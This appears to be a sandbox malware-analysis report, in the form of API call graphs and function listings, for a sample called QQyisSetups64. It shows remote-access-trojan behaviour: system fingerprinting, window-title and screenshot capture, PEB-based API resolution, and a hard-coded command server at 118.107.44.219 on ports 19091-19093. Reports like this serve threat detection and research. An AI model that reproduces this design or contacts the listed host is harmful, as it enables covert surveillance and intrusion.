CloseHandle 48826->48827 48827->48818 48829 378e014 48828->48829 48830 378e022 48829->48830 48831 3782c90 8 API calls 48829->48831 48832 378f707 77 API calls 48830->48832 48831->48830 48833 378e036 48832->48833 48834 3789730 80 API calls 48833->48834 48835 378e04e 48833->48835 48834->48835 48836 378e189 EnumWindows 48835->48836 48838 378f876 66 API calls __NMSG_WRITE 48835->48838 48839 378e1f0 Sleep 48835->48839 48840 3790542 67 API calls 48835->48840 48841 378e239 CreateEventA 48835->48841 48857 3782da0 306 API calls 48835->48857 48836->48835 48837 378e1a5 Sleep EnumWindows 48836->48837 48837->48835 48837->48837 48838->48835 48839->48835 48840->48835 48842 378f876 __NMSG_WRITE 66 API calls 48841->48842 48847 378e281 48842->48847 48843 378ca70 113 API calls 48843->48847 48844 378e2bf Sleep RegOpenKeyExW 48845 378e2f5 RegQueryValueExW 48844->48845 48844->48847 48845->48847 48846 3785430 268 API calls 48846->48847 48847->48843 48847->48844 48847->48846 48851 378e339 48847->48851 48848 378e345 CloseHandle 48848->48835 48849 378fa29 289 API calls 48849->48851 48850 378e39f Sleep 48850->48851 48851->48848 48851->48849 48851->48850 48852 378e422 WaitForSingleObject CloseHandle 48851->48852 48853 3790542 67 API calls 48851->48853 48855 378e3dd Sleep CloseHandle 48851->48855 48856 378e3cd WaitForSingleObject CloseHandle 48851->48856 48852->48851 48854 378e43c Sleep CloseHandle 48853->48854 48854->48835 48855->48835 48856->48855 48857->48835 48858->48604 48859->48618 48860->48375 48861 2c83200 Sleep 48862 2ca0254 48861->48862 48863 2c9f927 48864 2c9fb9a 48863->48864 48867 2c860df 71 API calls 48864->48867 48869 2c85ef8 48864->48869 48873 2c9f997 48864->48873 48865 2c9fb9c 48867->48865 48870 2c85f68 48869->48870 48871 2c9f9b7 48870->48871 48872 2c81100 70 API calls 48870->48872 48872->48870 48875 2c85f68 48873->48875 48874 2c9f9b7 48875->48874 48876 2c81100 70 API calls 48875->48876 48876->48875 48877 2c85e07 48878 2c9f0f9 RegQueryValueExW 48877->48878 48879 2c83f35 __wcsrev 48878->48879 48880 2c9f63d send 48881 2c9f0df 48888 2c82c60 WSAStartup CreateEventW InterlockedExchange 48881->48888 48884 2c9f0e4 48885 2c9f7db 48884->48885 48891 2c86f17 48884->48891 48903 2c85a20 CreateEventW 48885->48903 48889 2c86815 __cftof_l 5 API calls 48888->48889 48890 2c82cff 48889->48890 48890->48884 48894 2c86f21 48891->48894 48892 2c86e83 _malloc 66 API calls 48892->48894 48893 2c86f3b 48893->48884 48894->48892 48894->48893 48897 2c86f3d std::exception::exception 48894->48897 48931 2c88550 DecodePointer 48894->48931 48902 2c86f7b 48897->48902 48932 2c873e9 76 API calls __cinit 48897->48932 48898 2c86f85 48934 2c87836 RaiseException 48898->48934 48901 2c86f96 48933 2c86e24 66 API calls std::exception::operator= 48902->48933 48904 2c85a79 48903->48904 48905 2c85a83 48903->48905 48941 2c81280 DeleteCriticalSection RaiseException __CxxThrowException@8 48904->48941 48935 2c86410 HeapCreate 48905->48935 48909 2c85b1c CreateEventW 48912 2c85b5f CreateEventW 48909->48912 48913 2c85b55 48909->48913 48910 2c85b12 48942 2c81280 DeleteCriticalSection RaiseException __CxxThrowException@8 48910->48942 48914 2c85b7a 48912->48914 48915 2c85b84 CreateEventW 48912->48915 48943 2c81280 DeleteCriticalSection RaiseException __CxxThrowException@8 48913->48943 48944 2c81280 DeleteCriticalSection RaiseException __CxxThrowException@8 48914->48944 48918 2c85ba9 InitializeCriticalSectionAndSpinCount 48915->48918 48919 2c85b9f 48915->48919 48921 2c85c6d 48918->48921 48922 2c85c77 InitializeCriticalSectionAndSpinCount 48918->48922 48945 2c81280 DeleteCriticalSection RaiseException __CxxThrowException@8 48919->48945 48946 2c81280 DeleteCriticalSection RaiseException __CxxThrowException@8 48921->48946 48924 2c85c98 InterlockedExchange timeGetTime CreateEventW CreateEventW 48922->48924 48925 2c85c8e 48922->48925 48927 2c867ff 77 API calls 48924->48927 48947 2c81280 DeleteCriticalSection RaiseException __CxxThrowException@8 48925->48947 48928 2c85d2b 48927->48928 48929 2c867ff 77 API calls 48928->48929 48930 2c85d3b 48929->48930 48931->48894 48932->48902 48933->48898 48934->48901 48936 2c86441 48935->48936 48937 2c86437 48935->48937 48939 2c85af2 InitializeCriticalSectionAndSpinCount 48936->48939 48949 2c86e49 66 API calls 2 library calls 48936->48949 48948 2c81280 DeleteCriticalSection RaiseException __CxxThrowException@8 48937->48948 48939->48909 48939->48910 48941->48905 48942->48909 48943->48912 48944->48915 48945->48918 48946->48922 48947->48924 48948->48936 48949->48939 48950 2c85eb2 Sleep 48951 2c86f17 77 API calls 48950->48951 48952 2c85ec9 48951->48952 48953 2880032 48964 2880ae4 GetPEB 48953->48964 48956 2880ae4 GetPEB 48960 28802a7 48956->48960 48957 28804a6 GetNativeSystemInfo 48958 28804d3 VirtualAlloc 48957->48958 48962 2880a02 48957->48962 48959 28804ec VirtualAlloc 48958->48959 48961 28804ff 48958->48961 48959->48961 48960->48957 48960->48962 48966 2c87813 48961->48966 48965 288029b 48964->48965 48965->48956 48967 2c8781e 48966->48967 48968 2c87823 48966->48968 48980 2c8b54b GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 48967->48980 48972 2c8771d 48968->48972 48971 2c87831 48971->48962 48973 2c87729 __fcloseall 48972->48973 48975 2c877c6 __fcloseall 48973->48975 48977 2c87776 48973->48977 48981 2c875b9 48973->48981 48975->48971 48976 2c875b9 __CRT_INIT@12 149 API calls 48976->48975 48977->48975 48978 2c875b9 __CRT_INIT@12 149 API calls 48977->48978 48979 2c877a6 48977->48979 48978->48979 48979->48975 48979->48976 48980->48968 48982 2c875c5 __fcloseall 48981->48982 48983 2c875cd 48982->48983 48984 2c87647 48982->48984 49033 2c8803b HeapCreate 48983->49033 48986 2c876a8 48984->48986 48987 2c8764d 48984->48987 48988 2c876ad 48986->48988 48989 2c87706 48986->48989 48992 2c8766b 48987->48992 49003 2c875d6 __fcloseall 48987->49003 49043 2c88306 66 API calls _doexit 48987->49043 48993 2c89754 ___set_flsgetvalue 3 API calls 48988->48993 48989->49003 49049 2c89a58 79 API calls __freefls@4 48989->49049 48990 2c875d2 48991 2c875dd 48990->48991 48990->49003 49034 2c89ac6 86 API calls 4 library calls 48991->49034 48997 2c8767f 48992->48997 49044 2c8b0e4 67 API calls _free 48992->49044 48994 2c876b2 48993->48994 48999 2c89fe4 __calloc_crt 66 API calls 48994->48999 49047 2c87692 70 API calls __mtterm 48997->49047 49004 2c876be 48999->49004 49000 2c875e2 __RTC_Initialize 49011 2c875f2 GetCommandLineA 49000->49011 49026 2c875e6 49000->49026 49003->48977 49004->49003 49006 2c876ca DecodePointer 49004->49006 49005 2c87675 49045 2c897a5 70 API calls _free 49005->49045 49012 2c876df 49006->49012 49009 2c875eb 49009->49003 49010 2c8767a 49046 2c88059 HeapDestroy 49010->49046 49036 2c8b468 71 API calls 2 library calls 49011->49036 49015 2c876fa 49012->49015 49016 2c876e3 49012->49016 49048 2c86e49 66 API calls 2 library calls 49015->49048 49018 2c897e2 __CRT_INIT@12 66 API calls 49016->49018 49017 2c87602 49037 2c8ae9f 73 API calls __calloc_crt 49017->49037 49021 2c876ea GetCurrentThreadId 49018->49021 49021->49003 49022 2c8760c 49023 2c87610 49022->49023 49039 2c8b3ad 95 API calls 3 library calls 49022->49039 49038 2c897a5 70 API calls _free 49023->49038 49035 2c88059 HeapDestroy 49026->49035 49027 2c8761c 49028 2c87630 49027->49028 49040 2c8b137 94 API calls 6 library calls 49027->49040 49028->49009 49042 2c8b0e4 67 API calls _free 49028->49042 49031 2c87625 49031->49028 49041 2c88119 77 API calls 4 library calls 49031->49041 49033->48990 49034->49000 49035->49009 49036->49017 49037->49022 49038->49026 49039->49027 49040->49031 49041->49028 49042->49023 49043->48992 49044->49005 49045->49010 49046->48997 49047->49003 49048->49003 49049->49003 49050 2c84274 49051 2c9f814 CreateThread 49050->49051 49053 2c86110 49051->49053 49053->49053 49054 2899eb6 49055 2899ebb 49054->49055 49058 28807f7 49055->49058 49059 28807ae 49058->49059 49061 2c87813 154 API calls 49059->49061 49060 2880a02 49061->49060

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 0 3785430-37854b7 call 378f707 call 3796770 * 3 gethostname gethostbyname 9 378555c-378569d MultiByteToWideChar * 2 GetLastInputInfo GetTickCount wsprintfW MultiByteToWideChar * 2 call 3787490 GetSystemInfo wsprintfW call 3786c50 call 3786ee0 GetForegroundWindow 0->9 10 37854bd-3785504 inet_ntoa call 37903cf * 2 0->10 23 378569f-37856ac GetWindowTextW 9->23 24 37856b2-37856c0 9->24 10->9 20 3785506-3785508 10->20 22 3785510-378555a inet_ntoa call 37903cf * 2 20->22 22->9 23->24 26 37856cc-37856f0 lstrlenW call 3786d70 24->26 27 37856c2 24->27 33 3785702-3785726 call 378f876 26->33 34 37856f2-37856ff call 378f876 26->34 27->26 39 3785728 33->39 40 3785732-3785756 lstrlenW call 3786d70 33->40 34->33 39->40 43 3785768-37857b9 GetModuleHandleW GetProcAddress 40->43 44 3785758-3785765 call 378f876 40->44 46 37857bb-37857c4 GetNativeSystemInfo 43->46 47 37857c6-37857cd GetSystemInfo 43->47 44->43 49 37857d3-37857e1 46->49 47->49 50 37857ed-37857f2 49->50 51 37857e3-37857eb 49->51 53 37857f9-3785820 wsprintfW call 3786a70 GetCurrentProcessId 50->53 51->50 52 37857f4 51->52 52->53 56 3785822-378583c OpenProcess 53->56 57 3785885-378588c call 3786690 53->57 56->57 58 378583e-3785853 K32GetProcessImageFileNameW 56->58 65 378589e-37858ab 57->65 66 378588e-378589c 57->66 60 378585e-3785866 call 37880f0 58->60 61 3785855-378585c 58->61 67 378586b-378586d 60->67 63 378587f CloseHandle 61->63 63->57 68 37858ac-37859a1 call 378f876 call 3786490 call 3786150 call 378fc0e GetTickCount call 379043c call 37903a8 wsprintfW GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 65->68 66->68 69 3785878-378587e 67->69 70 378586f-3785876 67->70 83 37859ca-37859e9 68->83 84 37859a3-37859c8 68->84 69->63 70->63 85 37859ea-3785a0f call 3785a30 call 3783160 83->85 84->85 88 3785a11-3785a2e call 378efff call 378f00a 85->88
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0378F707: _malloc.LIBCMT ref: 0378F721
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378546C
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 03785485
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 03785495
                                                                                                                                                                                                                      • gethostname.WS2_32(?,00000032), ref: 037854A3
                                                                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 037854AD
                                                                                                                                                                                                                      • inet_ntoa.WS2_32 ref: 037854C5
                                                                                                                                                                                                                      • _strcat_s.LIBCMT ref: 037854D8
                                                                                                                                                                                                                      • _strcat_s.LIBCMT ref: 037854F1
                                                                                                                                                                                                                      • inet_ntoa.WS2_32 ref: 0378551A
                                                                                                                                                                                                                      • _strcat_s.LIBCMT ref: 0378552D
                                                                                                                                                                                                                      • _strcat_s.LIBCMT ref: 03785546
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03785573
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03785587
                                                                                                                                                                                                                      • GetLastInputInfo.USER32(?), ref: 0378559A
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 037855A0
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 037855D5
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 037855E8
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 037855FC
                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03785653
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0378566C
                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 03785695
                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 037856AC
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(000008CC), ref: 037856D3
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00000994), ref: 03785739
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 037857AA
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 037857B1
                                                                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?), ref: 037857C2
                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 037857CD
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 03785806
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 03785818
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 0378582E
                                                                                                                                                                                                                      • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 0378584B
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(037A5164), ref: 0378587F
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 037858E9
                                                                                                                                                                                                                      • __time64.LIBCMT ref: 037858F8
                                                                                                                                                                                                                      • __localtime64.LIBCMT ref: 0378592F
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 03785968
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 0378597D
                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 0378598C
                                                                                                                                                                                                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 03785999
                                                                                                                                                                                                                        • Part of subcall function 037880F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75A373E0,00000AD4,00000000), ref: 03788132
                                                                                                                                                                                                                        • Part of subcall function 037880F0: lstrcmpiW.KERNEL32(?,A:\), ref: 03788166
                                                                                                                                                                                                                        • Part of subcall function 037880F0: lstrcmpiW.KERNEL32(?,B:\), ref: 03788176
                                                                                                                                                                                                                        • Part of subcall function 037880F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 037881A6
                                                                                                                                                                                                                        • Part of subcall function 037880F0: lstrlenW.KERNEL32(?), ref: 037881B7
                                                                                                                                                                                                                        • Part of subcall function 037880F0: __wcsnicmp.LIBCMT ref: 037881CE
                                                                                                                                                                                                                        • Part of subcall function 037880F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 03788204
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                                                                                                                                                                                                      • String ID: %d min$1.0$2024.12. 3$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                                                                                                                                                                                                      • API String ID: 1101047656-1568689114
                                                                                                                                                                                                                      • Opcode ID: 5edcfed743d8acdc988741e9eb2ae80a5d378aa2c742fd76fd887b39a8c6f9d6
                                                                                                                                                                                                                      • Instruction ID: 1d770583eff9cfba53abae169bc38a8faa578285e50401c38299d14301a0b671
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5edcfed743d8acdc988741e9eb2ae80a5d378aa2c742fd76fd887b39a8c6f9d6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0FF1F7F5A40704AFD724EB64DC45FEB73B8AF88710F008A58E71A97181EB70AA44CF55
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?), ref: 028804AE
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 028804DE
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 028804F5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocVirtual$InfoNativeSystem
                                                                                                                                                                                                                      • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                                                                                                                                                      • API String ID: 4117132724-2899676511
                                                                                                                                                                                                                      • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                                                                                                                      • Instruction ID: 8e6e1f8afc06ee510e5b2dbba922f1dd1134104d7621abea32ec05a6ecd2e281
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1628B7A5083858FD730DF24C840BABBBE4FF94704F04482DE9C99B252E7749988CB56

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 251 378df10-378df72 call 3790542 Sleep 254 378df74-378df91 call 378f707 call 378fa29 CloseHandle 251->254 255 378df97-378df9d 251->255 254->255 256 378df9f call 3787620 255->256 257 378dfa4-378e019 GetLocalTime wsprintfW SetUnhandledExceptionFilter call 378fa29 CloseHandle call 378f707 255->257 256->257 267 378e028 257->267 268 378e01b-378e026 call 3782c90 257->268 270 378e02c-378e046 call 378f707 267->270 268->270 274 378e048-378e049 call 3789730 270->274 275 378e054 270->275 278 378e04e-378e052 274->278 277 378e058 275->277 279 378e063-378e06f call 378ce00 277->279 278->277 282 378e0b9-378e0fa call 378f876 * 2 279->282 283 378e071-378e0b7 call 378f876 * 2 279->283 292 378e100-378e110 282->292 283->292 293 378e152-378e15a 292->293 294 378e112-378e14c call 378ce00 call 378f876 * 2 292->294 296 378e15c-378e15e 293->296 297 378e162-378e169 293->297 294->293 296->297 299 378e16b-378e175 297->299 300 378e177-378e17b 297->300 301 378e181-378e187 299->301 300->301 303 378e189-378e1a3 EnumWindows 301->303 304 378e1c6-378e1ee call 3790542 call 3782da0 301->304 303->304 306 378e1a5-378e1c4 Sleep EnumWindows 303->306 312 378e200-378e2ac call 3790542 CreateEventA call 378f876 call 378ca70 304->312 313 378e1f0-378e1fb Sleep 304->313 306->304 306->306 321 378e2b7-378e2bd 312->321 313->279 322 378e318-378e32c call 3785430 321->322 323 378e2bf-378e2f3 Sleep RegOpenKeyExW 321->323 327 378e331-378e337 322->327 324 378e311-378e316 323->324 325 378e2f5-378e30b RegQueryValueExW 323->325 324->321 324->322 325->324 328 378e339-378e365 CloseHandle 327->328 329 378e36a-378e370 327->329 328->279 330 378e390 329->330 331 378e372-378e38e call 378fa29 329->331 332 378e394 330->332 331->332 335 378e396-378e39d 332->335 337 378e40d-378e420 335->337 338 378e39f-378e3ae Sleep 335->338 342 378e432-378e46c call 3790542 Sleep CloseHandle 337->342 343 378e422-378e42c WaitForSingleObject CloseHandle 337->343 338->335 339 378e3b0-378e3b7 338->339 339->337 340 378e3b9-378e3cb 339->340 347 378e3dd-378e408 Sleep CloseHandle 340->347 348 378e3cd-378e3d7 WaitForSingleObject CloseHandle 340->348 342->279 343->342 347->279 348->347
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 03790542: __fassign.LIBCMT ref: 03790538
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 0378DF64
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0378DF91
                                                                                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 0378DFA9
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0378DFE0
                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(037875B0), ref: 0378DFEE
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0378E007
                                                                                                                                                                                                                        • Part of subcall function 0378F707: _malloc.LIBCMT ref: 0378F721
                                                                                                                                                                                                                      • EnumWindows.USER32(03785CC0,?), ref: 0378E19D
                                                                                                                                                                                                                      • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0378E1AA
                                                                                                                                                                                                                      • EnumWindows.USER32(03785CC0,?), ref: 0378E1BE
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 0378E1F5
                                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0378E241
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000FA0), ref: 0378E2C4
                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 0378E2EB
                                                                                                                                                                                                                      • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0378E30B
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0378E35D
                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?), ref: 0378E3A4
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0378E3D0
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?), ref: 0378E3D7
                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?), ref: 0378E3E2
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0378E400
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0378E425
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?), ref: 0378E42C
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 0378E446
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0378E464
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                                                                                                                                                                                                      • String ID: %4d.%2d.%2d-%2d:%2d:%2d$118.107.44.219$118.107.44.219$118.107.44.219$118.107.44.219$19091$19092$19092$19093$Console$IpDatespecial
                                                                                                                                                                                                                      • API String ID: 1511462596-2550096010
                                                                                                                                                                                                                      • Opcode ID: 2c1e5f501beb2b6dba74dada890d16cd1924327ae8b1592f08d209acf54b701c
                                                                                                                                                                                                                      • Instruction ID: 6f53bcffb4c0187676d8605d6b5e47c973eadf982289e43d3de6b5c05f164cee
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c1e5f501beb2b6dba74dada890d16cd1924327ae8b1592f08d209acf54b701c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8D1C1B0684700AFE320FF64DC89F6EB7B8BBC5710F148A2CF55596685E7759404CB62

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0378BC8F
                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 0378BC9C
                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 0378BCA2
                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 0378BCAD
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0378BCBA
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000076), ref: 0378BCC2
                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0378BCD3
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000004E), ref: 0378BCF8
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000004F), ref: 0378BD26
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000004C), ref: 0378BD78
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000004D), ref: 0378BD8D
                                                                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0378BDA6
                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0378BDB4
                                                                                                                                                                                                                      • SetStretchBltMode.GDI32(?,00000003), ref: 0378BDC0
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000004F), ref: 0378BDCD
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000004E), ref: 0378BDE0
                                                                                                                                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 0378BE07
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378BE7A
                                                                                                                                                                                                                      • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 0378BE97
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378BEAF
                                                                                                                                                                                                                        • Part of subcall function 0378F707: _malloc.LIBCMT ref: 0378F721
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0378BF23
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0378BF2D
                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 0378BF39
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0378BFDF
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0378BFE9
                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 0378BFF5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                                                                                                                                                                                                      • String ID: ($6$gfff$gfff
                                                                                                                                                                                                                      • API String ID: 3293817703-713438465
                                                                                                                                                                                                                      • Opcode ID: 6faee7b9db8f52762a3227456823e1b2b20d1ef3da0ee55d2564470491d1dad5
                                                                                                                                                                                                                      • Instruction ID: 57ea671c80812e2cbf9b28593befbe93e225fbcc0ee55b6063da1c40e4f65513
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6faee7b9db8f52762a3227456823e1b2b20d1ef3da0ee55d2564470491d1dad5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44D16EB1E01308EFDB14EFE9E889A9EBBB9FF88300F144529F505AB241D774A945CB51

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(75A373E0), ref: 03786A94
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 03786AA7
                                                                                                                                                                                                                        • Part of subcall function 03786910: GetCurrentProcessId.KERNEL32(453DC9E3,00000000,00000000,75A373E0,?,00000000,037A10DB,000000FF,?,03786AB3,00000000), ref: 03786938
                                                                                                                                                                                                                        • Part of subcall function 03786910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,037A10DB,000000FF,?,03786AB3,00000000), ref: 03786947
                                                                                                                                                                                                                        • Part of subcall function 03786910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,037A10DB,000000FF,?,03786AB3,00000000), ref: 03786960
                                                                                                                                                                                                                        • Part of subcall function 03786910: CloseHandle.KERNEL32(00000000,?,00000000,037A10DB,000000FF,?,03786AB3,00000000), ref: 0378696B
